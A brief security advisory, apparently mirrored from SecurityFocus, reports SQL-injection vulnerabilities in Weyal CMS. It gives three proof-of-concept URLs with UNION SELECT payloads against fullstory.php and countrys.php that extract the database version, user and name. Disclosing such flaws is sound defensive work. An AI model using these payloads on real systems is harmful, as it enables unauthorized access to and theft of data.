11 lines
No EOL
672 B
Text
11 lines
No EOL
672 B
Text
source: https://www.securityfocus.com/bid/60089/info
|
|
|
|
Weyal CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
|
|
|
|
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
http://www.example.com/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6
|
|
|
|
http://www.example.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14
|
|
|
|
http://www.example.com/countrys.php?countryid=-999 union all select 1,version(),database() |